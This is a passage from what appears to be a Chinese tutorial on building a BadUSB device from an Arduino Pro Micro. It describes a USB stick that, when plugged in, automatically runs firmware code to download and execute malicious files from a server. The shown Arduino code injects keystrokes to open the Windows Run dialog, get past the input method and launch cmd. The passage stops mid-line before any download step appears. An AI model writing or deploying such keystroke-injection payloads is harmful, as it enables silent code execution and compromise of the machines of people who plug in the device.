漏洞背景
是今年计算机安全领域的热门话题之一,该漏洞由Karsten Nohl和Jakob Lell共同发现,并在今年的BlackHat安全大会上公布。BadUsb号称是世界上最邪恶的USB外设。笔者使用他们的代码做了个类似的U盘,用户插入U盘,就会自动执行预置在固件中的恶意代码,下载服务器上恶意文件,执行恶意操作….
硬件准备
这里我们使用的是:
BS Micro pro micro leonardo Arduino
开发板(某宝里面买的)
硬件代码
#include <Keyboard.h>
void setup() {//初始化
Keyboard.begin();//开始键盘通讯
delay(1000);//延时
Keyboard.press(KEY_LEFT_GUI);//win键
delay(200);
Keyboard.press(‘r’);//r键
delay(300);
Keyboard.release(KEY_LEFT_GUI);//释放win 键
Keyboard.release(‘r’);//释放R键
Keyboard.press(KEY_CAPS_LOCK);//切换大小写,绕过输入法
Keyboard.release(KEY_CAPS_LOCK);
Keyboard.println(“cmd “);
delay(200);
Keyboard.press(KEY_RETURN);//按下回车键
delay(200);
Keyboard.release(KEY_RETURN);//按下回车键
delay(500);
Keyboard.